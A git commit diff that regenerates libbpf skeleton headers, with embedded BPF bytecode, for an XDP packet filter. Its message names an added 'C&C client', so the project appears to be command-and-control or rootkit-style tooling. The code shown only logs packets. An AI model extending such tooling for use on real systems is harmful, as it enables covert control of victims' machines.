Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client

h3xduck
2021-11-22 18:58:58 -05:00
parent 23c7331d16
commit b04200526c
19 changed files with 522 additions and 371 deletions

Binary file not shown.

Binary file not shown.


@@ -1,233 +0,0 @@
/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
/* THIS FILE IS AUTOGENERATED! */
#ifndef __MINIMAL_BPF_SKEL_H__
#define __MINIMAL_BPF_SKEL_H__
#include <stdlib.h>
#include <bpf/libbpf.h>
struct minimal_bpf {
struct bpf_object_skeleton *skeleton;
struct bpf_object *obj;
struct {
struct bpf_map *rodata;
struct bpf_map *bss;
} maps;
struct {
struct bpf_program *handle_tp;
} progs;
struct {
struct bpf_link *handle_tp;
} links;
struct minimal_bpf__bss {
int my_pid;
} *bss;
struct minimal_bpf__rodata {
char handle_tp_____fmt[28];
} *rodata;
};
static void
minimal_bpf__destroy(struct minimal_bpf *obj)
{
if (!obj)
return;
if (obj->skeleton)
bpf_object__destroy_skeleton(obj->skeleton);
free(obj);
}
static inline int
minimal_bpf__create_skeleton(struct minimal_bpf *obj);
static inline struct minimal_bpf *
minimal_bpf__open_opts(const struct bpf_object_open_opts *opts)
{
struct minimal_bpf *obj;
obj = (struct minimal_bpf *)calloc(1, sizeof(*obj));
if (!obj)
return NULL;
if (minimal_bpf__create_skeleton(obj))
goto err;
if (bpf_object__open_skeleton(obj->skeleton, opts))
goto err;
return obj;
err:
minimal_bpf__destroy(obj);
return NULL;
}
static inline struct minimal_bpf *
minimal_bpf__open(void)
{
return minimal_bpf__open_opts(NULL);
}
static inline int
minimal_bpf__load(struct minimal_bpf *obj)
{
return bpf_object__load_skeleton(obj->skeleton);
}
static inline struct minimal_bpf *
minimal_bpf__open_and_load(void)
{
struct minimal_bpf *obj;
obj = minimal_bpf__open();
if (!obj)
return NULL;
if (minimal_bpf__load(obj)) {
minimal_bpf__destroy(obj);
return NULL;
}
return obj;
}
static inline int
minimal_bpf__attach(struct minimal_bpf *obj)
{
return bpf_object__attach_skeleton(obj->skeleton);
}
static inline void
minimal_bpf__detach(struct minimal_bpf *obj)
{
return bpf_object__detach_skeleton(obj->skeleton);
}
static inline int
minimal_bpf__create_skeleton(struct minimal_bpf *obj)
{
struct bpf_object_skeleton *s;
s = (struct bpf_object_skeleton *)calloc(1, sizeof(*s));
if (!s)
return -1;
obj->skeleton = s;
s->sz = sizeof(*s);
s->name = "minimal_bpf";
s->obj = &obj->obj;
/* maps */
s->map_cnt = 2;
s->map_skel_sz = sizeof(*s->maps);
s->maps = (struct bpf_map_skeleton *)calloc(s->map_cnt, s->map_skel_sz);
if (!s->maps)
goto err;
s->maps[0].name = "minimal_.rodata";
s->maps[0].map = &obj->maps.rodata;
s->maps[0].mmaped = (void **)&obj->rodata;
s->maps[1].name = "minimal_.bss";
s->maps[1].map = &obj->maps.bss;
s->maps[1].mmaped = (void **)&obj->bss;
/* programs */
s->prog_cnt = 1;
s->prog_skel_sz = sizeof(*s->progs);
s->progs = (struct bpf_prog_skeleton *)calloc(s->prog_cnt, s->prog_skel_sz);
if (!s->progs)
goto err;
s->progs[0].name = "handle_tp";
s->progs[0].prog = &obj->progs.handle_tp;
s->progs[0].link = &obj->links.handle_tp;
s->data_sz = 2400;
s->data = (void *)"\
\x7f\x45\x4c\x46\x02\x01\x01\0\0\0\0\0\0\0\0\0\x01\0\xf7\0\x01\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\xe0\x05\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\x40\0\x0e\0\
\x0d\0\x85\0\0\0\x0e\0\0\0\x77\0\0\0\x20\0\0\0\x18\x01\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\x61\x11\0\0\0\0\0\0\x5d\x01\x05\0\0\0\0\0\x18\x01\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\xb7\x02\0\0\x1c\0\0\0\xbf\x03\0\0\0\0\0\0\x85\0\0\0\x06\0\0\0\xb7\0\0\0\0\
\0\0\0\x95\0\0\0\0\0\0\0\x44\x75\x61\x6c\x20\x42\x53\x44\x2f\x47\x50\x4c\0\0\0\
\0\x42\x50\x46\x20\x74\x72\x69\x67\x67\x65\x72\x65\x64\x20\x66\x72\x6f\x6d\x20\
\x50\x49\x44\x20\x25\x64\x2e\x0a\0\x9f\xeb\x01\0\x18\0\0\0\0\0\0\0\x10\x01\0\0\
\x10\x01\0\0\x1c\x01\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\0\x01\0\0\x0d\x03\0\0\
\0\x01\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\x01\x09\0\0\0\x01\
\0\0\x0c\x02\0\0\0\xcd\0\0\0\0\0\0\x01\x01\0\0\0\x08\0\0\x01\0\0\0\0\0\0\0\x03\
\0\0\0\0\x05\0\0\0\x07\0\0\0\x0d\0\0\0\xd2\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\
\xe6\0\0\0\0\0\0\x0e\x06\0\0\0\x01\0\0\0\xee\0\0\0\0\0\0\x0e\x03\0\0\0\x01\0\0\
\0\0\0\0\0\0\0\0\x0a\x05\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0\x0a\0\0\0\x07\0\0\0\
\x1c\0\0\0\xf5\0\0\0\0\0\0\x0e\x0b\0\0\0\0\0\0\0\x07\x01\0\0\x01\0\0\x0f\0\0\0\
\0\x09\0\0\0\0\0\0\0\x04\0\0\0\x0c\x01\0\0\x01\0\0\x0f\0\0\0\0\x0c\0\0\0\0\0\0\
\0\x1c\0\0\0\x14\x01\0\0\x01\0\0\x0f\0\0\0\0\x08\0\0\0\0\0\0\0\x0d\0\0\0\0\x63\
\x74\x78\0\x69\x6e\x74\0\x68\x61\x6e\x64\x6c\x65\x5f\x74\x70\0\x74\x70\x2f\x73\
\x79\x73\x63\x61\x6c\x6c\x73\x2f\x73\x79\x73\x5f\x65\x6e\x74\x65\x72\x5f\x77\
\x72\x69\x74\x65\0\x2f\x68\x6f\x6d\x65\x2f\x6f\x73\x62\x6f\x78\x65\x73\x2f\x54\
\x46\x47\x2f\x73\x72\x63\x2f\x65\x62\x70\x66\x2f\x6d\x69\x6e\x69\x6d\x61\x6c\
\x2e\x62\x70\x66\x2e\x63\0\x09\x69\x6e\x74\x20\x70\x69\x64\x20\x3d\x20\x62\x70\
\x66\x5f\x67\x65\x74\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x70\x69\x64\x5f\x74\
\x67\x69\x64\x28\x29\x20\x3e\x3e\x20\x33\x32\x3b\0\x09\x69\x66\x20\x28\x70\x69\
\x64\x20\x21\x3d\x20\x6d\x79\x5f\x70\x69\x64\x29\0\x09\x62\x70\x66\x5f\x70\x72\
\x69\x6e\x74\x6b\x28\x22\x42\x50\x46\x20\x74\x72\x69\x67\x67\x65\x72\x65\x64\
\x20\x66\x72\x6f\x6d\x20\x50\x49\x44\x20\x25\x64\x2e\x5c\x6e\x22\x2c\x20\x70\
\x69\x64\x29\x3b\0\x7d\0\x63\x68\x61\x72\0\x5f\x5f\x41\x52\x52\x41\x59\x5f\x53\
\x49\x5a\x45\x5f\x54\x59\x50\x45\x5f\x5f\0\x4c\x49\x43\x45\x4e\x53\x45\0\x6d\
\x79\x5f\x70\x69\x64\0\x68\x61\x6e\x64\x6c\x65\x5f\x74\x70\x2e\x5f\x5f\x5f\x5f\
\x66\x6d\x74\0\x2e\x62\x73\x73\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\
\x6e\x73\x65\0\x9f\xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x6c\0\0\0\
\x80\0\0\0\0\0\0\0\x08\0\0\0\x13\0\0\0\x01\0\0\0\0\0\0\0\x04\0\0\0\x10\0\0\0\
\x13\0\0\0\x06\0\0\0\0\0\0\0\x2f\0\0\0\x58\0\0\0\x0c\x34\0\0\x08\0\0\0\x2f\0\0\
\0\x58\0\0\0\x27\x34\0\0\x10\0\0\0\x2f\0\0\0\x85\0\0\0\x0d\x3c\0\0\x28\0\0\0\
\x2f\0\0\0\x85\0\0\0\x06\x3c\0\0\x30\0\0\0\x2f\0\0\0\x99\0\0\0\x02\x48\0\0\x58\
\0\0\0\x2f\0\0\0\xcb\0\0\0\x01\x54\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\x9b\0\0\0\0\0\x02\0\x58\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\
\x05\0\0\0\0\0\0\0\0\0\x1c\0\0\0\0\0\0\0\0\0\0\0\x03\0\x02\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x03\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x93\0\0\0\
\x11\0\x03\0\0\0\0\0\0\0\0\0\x0d\0\0\0\0\0\0\0\x2b\0\0\0\x12\0\x02\0\0\0\0\0\0\
\0\0\0\x68\0\0\0\0\0\0\0\x6b\0\0\0\x11\0\x04\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\
\0\x10\0\0\0\0\0\0\0\x01\0\0\0\x07\0\0\0\x30\0\0\0\0\0\0\0\x01\0\0\0\x04\0\0\0\
\xf0\0\0\0\0\0\0\0\0\0\0\0\x07\0\0\0\x08\x01\0\0\0\0\0\0\x0a\0\0\0\x04\0\0\0\
\x20\x01\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x2c\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x40\
\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x50\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x60\0\0\0\
\0\0\0\0\0\0\0\0\x03\0\0\0\x70\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x80\0\0\0\0\0\0\
\0\0\0\0\0\x03\0\0\0\x90\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x0c\x0b\x03\0\x2e\x74\
\x65\x78\x74\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\x2e\x65\x78\x74\0\x68\x61\x6e\
\x64\x6c\x65\x5f\x74\x70\x2e\x5f\x5f\x5f\x5f\x66\x6d\x74\0\x2e\x62\x73\x73\0\
\x68\x61\x6e\x64\x6c\x65\x5f\x74\x70\0\x2e\x6c\x6c\x76\x6d\x5f\x61\x64\x64\x72\
\x73\x69\x67\0\x2e\x72\x65\x6c\x74\x70\x2f\x73\x79\x73\x63\x61\x6c\x6c\x73\x2f\
\x73\x79\x73\x5f\x65\x6e\x74\x65\x72\x5f\x77\x72\x69\x74\x65\0\x6c\x69\x63\x65\
\x6e\x73\x65\0\x6d\x79\x5f\x70\x69\x64\0\x2e\x73\x74\x72\x74\x61\x62\0\x2e\x73\
\x79\x6d\x74\x61\x62\0\x2e\x72\x6f\x64\x61\x74\x61\0\x2e\x72\x65\x6c\x2e\x42\
\x54\x46\0\x4c\x49\x43\x45\x4e\x53\x45\0\x4c\x42\x42\x30\x5f\x32\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\x06\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\x47\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\x40\0\0\0\0\0\0\0\x68\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x08\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x63\0\0\0\x01\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa8\0\0\0\0\0\
\0\0\x0d\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x26\0\
\0\0\x08\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb8\0\0\0\0\0\0\0\x04\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x82\0\0\0\x01\0\0\0\
\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb8\0\0\0\0\0\0\0\x1c\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x8e\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\xd4\0\0\0\0\0\0\0\x44\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\x0b\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\x18\x03\0\0\0\0\0\0\xa0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x7a\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb8\x03\0\0\0\0\
\0\0\xc0\0\0\0\0\0\0\0\x0d\0\0\0\x05\0\0\0\x08\0\0\0\0\0\0\0\x18\0\0\0\0\0\0\0\
\x43\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x78\x04\0\0\0\0\0\0\x20\0\
\0\0\0\0\0\0\x08\0\0\0\x02\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x8a\0\0\0\
\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x98\x04\0\0\0\0\0\0\x30\0\0\0\0\0\0\
\0\x08\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x07\0\0\0\x09\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xc8\x04\0\0\0\0\0\0\x70\0\0\0\0\0\0\0\x08\0\0\
\0\x07\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x35\0\0\0\x03\x4c\xff\x6f\0\0\
\0\x80\0\0\0\0\0\0\0\0\0\0\0\0\x38\x05\0\0\0\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x72\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\x3b\x05\0\0\0\0\0\0\xa2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0";
return 0;
err:
bpf_object__destroy_skeleton(s);
return -1;
}
#endif /* __MINIMAL_BPF_SKEL_H__ */

Binary file not shown.

Binary file not shown.


@@ -11,7 +11,7 @@ struct xdp_filter_bpf {
struct bpf_object_skeleton *skeleton; struct bpf_object_skeleton *skeleton;
struct bpf_object *obj; struct bpf_object *obj;
struct { struct {
struct bpf_map *rb; struct bpf_map *rodata;
} maps; } maps;
struct { struct {
struct bpf_program *xdp_receive; struct bpf_program *xdp_receive;
@@ -19,6 +19,10 @@ struct xdp_filter_bpf {
struct { struct {
struct bpf_link *xdp_receive; struct bpf_link *xdp_receive;
} links; } links;
struct xdp_filter_bpf__rodata {
char xdp_receive_____fmt[15];
char xdp_receive_____fmt_1[15];
} *rodata;
}; };
static void static void
@@ -113,8 +117,9 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj)
if (!s->maps) if (!s->maps)
goto err; goto err;
s->maps[0].name = "rb"; s->maps[0].name = "xdp_filt.rodata";
s->maps[0].map = &obj->maps.rb; s->maps[0].map = &obj->maps.rodata;
s->maps[0].mmaped = (void **)&obj->rodata;
/* programs */ /* programs */
s->prog_cnt = 1; s->prog_cnt = 1;
@@ -127,119 +132,137 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj)
s->progs[0].prog = &obj->progs.xdp_receive; s->progs[0].prog = &obj->progs.xdp_receive;
s->progs[0].link = &obj->links.xdp_receive; s->progs[0].link = &obj->links.xdp_receive;
s->data_sz = 3128; s->data_sz = 3568;
s->data = (void *)"\ s->data = (void *)"\
\x7f\x45\x4c\x46\x02\x01\x01\0\0\0\0\0\0\0\0\0\x01\0\xf7\0\x01\0\0\0\0\0\0\0\0\ \x7f\x45\x4c\x46\x02\x01\x01\0\0\0\0\0\0\0\0\0\x01\0\xf7\0\x01\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x38\x09\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\x40\0\x0c\0\ \0\0\0\0\0\0\0\0\0\0\0\xb0\x0a\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\x40\0\x0d\0\
\x0b\0\x61\x12\0\0\0\0\0\0\x61\x11\x04\0\0\0\0\0\xbf\x23\0\0\0\0\0\0\x07\x03\0\ \x0c\0\xbf\x16\0\0\0\0\0\0\x18\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb7\x02\0\0\x0f\
\0\x0e\0\0\0\x2d\x13\x11\0\0\0\0\0\xbf\x23\0\0\0\0\0\0\x07\x03\0\0\x22\0\0\0\ \0\0\0\x85\0\0\0\x06\0\0\0\xb7\0\0\0\x02\0\0\0\x61\x61\0\0\0\0\0\0\x61\x62\x04\
\x2d\x13\x0e\0\0\0\0\0\xbf\x23\0\0\0\0\0\0\x07\x03\0\0\x2a\0\0\0\x2d\x13\x0b\0\ \0\0\0\0\0\xbf\x13\0\0\0\0\0\0\x07\x03\0\0\x0e\0\0\0\x2d\x23\x11\0\0\0\0\0\xbf\
\0\0\0\0\x71\x24\x17\0\0\0\0\0\x55\x04\x09\0\x11\0\0\0\x69\x24\x24\0\0\0\0\0\ \x13\0\0\0\0\0\0\x07\x03\0\0\x22\0\0\0\x2d\x23\x0e\0\0\0\0\0\xbf\x13\0\0\0\0\0\
\x55\x04\x07\0\x13\x8d\0\0\xbf\x24\0\0\0\0\0\0\x07\x04\0\0\x2e\0\0\0\x2d\x14\ \0\x07\x03\0\0\x2a\0\0\0\x2d\x23\x0b\0\0\0\0\0\x71\x14\x17\0\0\0\0\0\x55\x04\
\x04\0\0\0\0\0\x69\x21\x26\0\0\0\0\0\x55\x01\x02\0\0\x0c\0\0\x71\x31\0\0\0\0\0\ \x09\0\x11\0\0\0\x69\x14\x24\0\0\0\0\0\x55\x04\x07\0\x13\x8d\0\0\xbf\x14\0\0\0\
\0\x15\x01\x02\0\x74\0\0\0\xb7\0\0\0\x02\0\0\0\x95\0\0\0\0\0\0\0\x71\x21\x2b\0\ \0\0\0\x07\x04\0\0\x2e\0\0\0\x2d\x24\x04\0\0\0\0\0\x69\x12\x26\0\0\0\0\0\x55\
\0\0\0\0\x15\x01\x01\0\x65\0\0\0\x05\0\xfb\xff\0\0\0\0\x71\x21\x2c\0\0\0\0\0\ \x02\x02\0\0\x0c\0\0\x71\x32\0\0\0\0\0\0\x15\x02\x01\0\x74\0\0\0\x95\0\0\0\0\0\
\x55\x01\xf9\xff\x73\0\0\0\x71\x21\x2d\0\0\0\0\0\xb7\0\0\0\x01\0\0\0\x15\x01\ \0\0\x71\x12\x2b\0\0\0\0\0\x15\x02\x01\0\x65\0\0\0\x05\0\xfc\xff\0\0\0\0\x71\
\x01\0\x74\0\0\0\xb7\0\0\0\x02\0\0\0\x95\0\0\0\0\0\0\0\x44\x75\x61\x6c\x20\x42\ \x12\x2c\0\0\0\0\0\x55\x02\xfa\xff\x73\0\0\0\x71\x11\x2d\0\0\0\0\0\x55\x01\xf8\
\x53\x44\x2f\x47\x50\x4c\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9f\xeb\x01\0\ \xff\x74\0\0\0\x18\x01\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\xb7\x02\0\0\x0f\0\0\0\x85\
\x18\0\0\0\0\0\0\0\xa0\x01\0\0\xa0\x01\0\0\x1c\x02\0\0\0\0\0\0\0\0\0\x02\x03\0\ \0\0\0\x06\0\0\0\xb7\0\0\0\x01\0\0\0\x05\0\xf2\xff\0\0\0\0\x44\x75\x61\x6c\x20\
\0\0\x01\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\x01\0\0\0\0\0\0\0\x03\0\0\0\0\x02\0\ \x42\x53\x44\x2f\x47\x50\x4c\0\x42\x50\x46\x20\x74\x72\x69\x67\x67\x65\x72\x65\
\0\0\x04\0\0\0\x1b\0\0\0\x05\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\0\0\0\0\0\0\0\ \x64\x0a\0\x42\x50\x46\x20\x66\x69\x6e\x69\x73\x68\x65\x64\x0a\x20\0\x9f\xeb\
\x02\x06\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0\x02\0\0\0\x04\0\0\0\0\0\x04\0\0\0\0\0\ \x01\0\x18\0\0\0\0\0\0\0\x74\x01\0\0\x74\x01\0\0\xa3\x02\0\0\0\0\0\0\0\0\0\x02\
\x02\0\0\x04\x10\0\0\0\x19\0\0\0\x01\0\0\0\0\0\0\0\x1e\0\0\0\x05\0\0\0\x40\0\0\ \x02\0\0\0\x01\0\0\0\x06\0\0\x04\x18\0\0\0\x08\0\0\0\x03\0\0\0\0\0\0\0\x0d\0\0\
\0\x2a\0\0\0\0\0\0\x0e\x07\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\x0a\0\0\0\x2d\0\0\ \0\x03\0\0\0\x20\0\0\0\x16\0\0\0\x03\0\0\0\x40\0\0\0\x20\0\0\0\x03\0\0\0\x60\0\
\0\x06\0\0\x04\x18\0\0\0\x34\0\0\0\x0b\0\0\0\0\0\0\0\x39\0\0\0\x0b\0\0\0\x20\0\ \0\0\x30\0\0\0\x03\0\0\0\x80\0\0\0\x3f\0\0\0\x03\0\0\0\xa0\0\0\0\x4e\0\0\0\0\0\
\0\0\x42\0\0\0\x0b\0\0\0\x40\0\0\0\x4c\0\0\0\x0b\0\0\0\x60\0\0\0\x5c\0\0\0\x0b\ \0\x08\x04\0\0\0\x54\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\0\0\0\0\x01\0\0\x0d\
\0\0\0\x80\0\0\0\x6b\0\0\0\x0b\0\0\0\xa0\0\0\0\x7a\0\0\0\0\0\0\x08\x0c\0\0\0\ \x06\0\0\0\x61\0\0\0\x01\0\0\0\x65\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\x01\x69\0\
\x80\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\0\0\0\0\x01\0\0\x0d\x02\0\0\0\x8d\0\0\ \0\0\x01\0\0\x0c\x05\0\0\0\x48\x02\0\0\0\0\0\x01\x01\0\0\0\x08\0\0\x01\0\0\0\0\
\0\x09\0\0\0\x91\0\0\0\x01\0\0\x0c\x0d\0\0\0\x01\x02\0\0\0\0\0\x01\x01\0\0\0\ \0\0\0\x03\0\0\0\0\x08\0\0\0\x0a\0\0\0\x0d\0\0\0\x4d\x02\0\0\0\0\0\x01\x04\0\0\
\x08\0\0\x01\0\0\0\0\0\0\0\x03\0\0\0\0\x0f\0\0\0\x04\0\0\0\x0d\0\0\0\x06\x02\0\ \0\x20\0\0\0\x61\x02\0\0\0\0\0\x0e\x09\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x0a\x08\0\
\0\0\0\0\x0e\x10\0\0\0\x01\0\0\0\x0e\x02\0\0\x01\0\0\x0f\0\0\0\0\x08\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\x03\0\0\0\0\x0c\0\0\0\x0a\0\0\0\x0f\0\0\0\x69\x02\0\0\0\0\0\
\0\0\x10\0\0\0\x14\x02\0\0\x01\0\0\x0f\0\0\0\0\x11\0\0\0\0\0\0\0\x0d\0\0\0\0\ \x0e\x0d\0\0\0\0\0\0\0\x7d\x02\0\0\0\0\0\x0e\x0d\0\0\0\0\0\0\0\x93\x02\0\0\x02\
\x69\x6e\x74\0\x5f\x5f\x41\x52\x52\x41\x59\x5f\x53\x49\x5a\x45\x5f\x54\x59\x50\ \0\0\x0f\0\0\0\0\x0e\0\0\0\0\0\0\0\x0f\0\0\0\x0f\0\0\0\x0f\0\0\0\x0f\0\0\0\x9b\
\x45\x5f\x5f\0\x74\x79\x70\x65\0\x6d\x61\x78\x5f\x65\x6e\x74\x72\x69\x65\x73\0\ \x02\0\0\x01\0\0\x0f\0\0\0\0\x0b\0\0\0\0\0\0\0\x0d\0\0\0\0\x78\x64\x70\x5f\x6d\
\x72\x62\0\x78\x64\x70\x5f\x6d\x64\0\x64\x61\x74\x61\0\x64\x61\x74\x61\x5f\x65\ \x64\0\x64\x61\x74\x61\0\x64\x61\x74\x61\x5f\x65\x6e\x64\0\x64\x61\x74\x61\x5f\
\x6e\x64\0\x64\x61\x74\x61\x5f\x6d\x65\x74\x61\0\x69\x6e\x67\x72\x65\x73\x73\ \x6d\x65\x74\x61\0\x69\x6e\x67\x72\x65\x73\x73\x5f\x69\x66\x69\x6e\x64\x65\x78\
\x5f\x69\x66\x69\x6e\x64\x65\x78\0\x72\x78\x5f\x71\x75\x65\x75\x65\x5f\x69\x6e\ \0\x72\x78\x5f\x71\x75\x65\x75\x65\x5f\x69\x6e\x64\x65\x78\0\x65\x67\x72\x65\
\x64\x65\x78\0\x65\x67\x72\x65\x73\x73\x5f\x69\x66\x69\x6e\x64\x65\x78\0\x5f\ \x73\x73\x5f\x69\x66\x69\x6e\x64\x65\x78\0\x5f\x5f\x75\x33\x32\0\x75\x6e\x73\
\x5f\x75\x33\x32\0\x75\x6e\x73\x69\x67\x6e\x65\x64\x20\x69\x6e\x74\0\x63\x74\ \x69\x67\x6e\x65\x64\x20\x69\x6e\x74\0\x63\x74\x78\0\x69\x6e\x74\0\x78\x64\x70\
\x78\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\0\x78\x64\x70\0\x2f\x68\x6f\ \x5f\x72\x65\x63\x65\x69\x76\x65\0\x78\x64\x70\x5f\x70\x72\x6f\x67\0\x2f\x68\
\x6d\x65\x2f\x6f\x73\x62\x6f\x78\x65\x73\x2f\x54\x46\x47\x2f\x73\x72\x63\x2f\ \x6f\x6d\x65\x2f\x6f\x73\x62\x6f\x78\x65\x73\x2f\x54\x46\x47\x2f\x73\x72\x63\
\x65\x62\x70\x66\x2f\x78\x64\x70\x5f\x66\x69\x6c\x74\x65\x72\x2e\x62\x70\x66\ \x2f\x65\x62\x70\x66\x2f\x78\x64\x70\x5f\x66\x69\x6c\x74\x65\x72\x2e\x62\x70\
\x2e\x63\0\x20\x20\x20\x20\x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\x20\x3d\x20\ \x66\x2e\x63\0\x69\x6e\x74\x20\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\x28\
\x28\x76\x6f\x69\x64\x20\x2a\x29\x28\x6c\x6f\x6e\x67\x29\x63\x74\x78\x2d\x3e\ \x73\x74\x72\x75\x63\x74\x20\x78\x64\x70\x5f\x6d\x64\x20\x2a\x63\x74\x78\x29\0\
\x64\x61\x74\x61\x3b\0\x20\x20\x20\x20\x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\ \x20\x20\x20\x20\x62\x70\x66\x5f\x70\x72\x69\x6e\x74\x6b\x28\x22\x42\x50\x46\
\x5f\x65\x6e\x64\x20\x3d\x20\x28\x76\x6f\x69\x64\x20\x2a\x29\x28\x6c\x6f\x6e\ \x20\x74\x72\x69\x67\x67\x65\x72\x65\x64\x5c\x6e\x22\x29\x3b\0\x20\x20\x20\x20\
\x67\x29\x63\x74\x78\x2d\x3e\x64\x61\x74\x61\x5f\x65\x6e\x64\x3b\0\x20\x20\x20\ \x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\x20\x3d\x20\x28\x76\x6f\x69\x64\x20\
\x20\x69\x66\x20\x28\x28\x76\x6f\x69\x64\x20\x2a\x29\x65\x74\x68\x20\x2b\x20\ \x2a\x29\x28\x6c\x6f\x6e\x67\x29\x63\x74\x78\x2d\x3e\x64\x61\x74\x61\x3b\0\x20\
\x73\x69\x7a\x65\x6f\x66\x28\x2a\x65\x74\x68\x29\x20\x3e\x20\x64\x61\x74\x61\ \x20\x20\x20\x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\x5f\x65\x6e\x64\x20\x3d\
\x5f\x65\x6e\x64\x29\0\x20\x20\x20\x20\x69\x66\x20\x28\x69\x70\x2d\x3e\x70\x72\ \x20\x28\x76\x6f\x69\x64\x20\x2a\x29\x28\x6c\x6f\x6e\x67\x29\x63\x74\x78\x2d\
\x6f\x74\x6f\x63\x6f\x6c\x20\x21\x3d\x20\x49\x50\x50\x52\x4f\x54\x4f\x5f\x55\ \x3e\x64\x61\x74\x61\x5f\x65\x6e\x64\x3b\0\x20\x20\x20\x20\x69\x66\x20\x28\x28\
\x44\x50\x29\0\x20\x20\x20\x20\x69\x66\x20\x28\x75\x64\x70\x2d\x3e\x64\x65\x73\ \x76\x6f\x69\x64\x20\x2a\x29\x65\x74\x68\x20\x2b\x20\x73\x69\x7a\x65\x6f\x66\
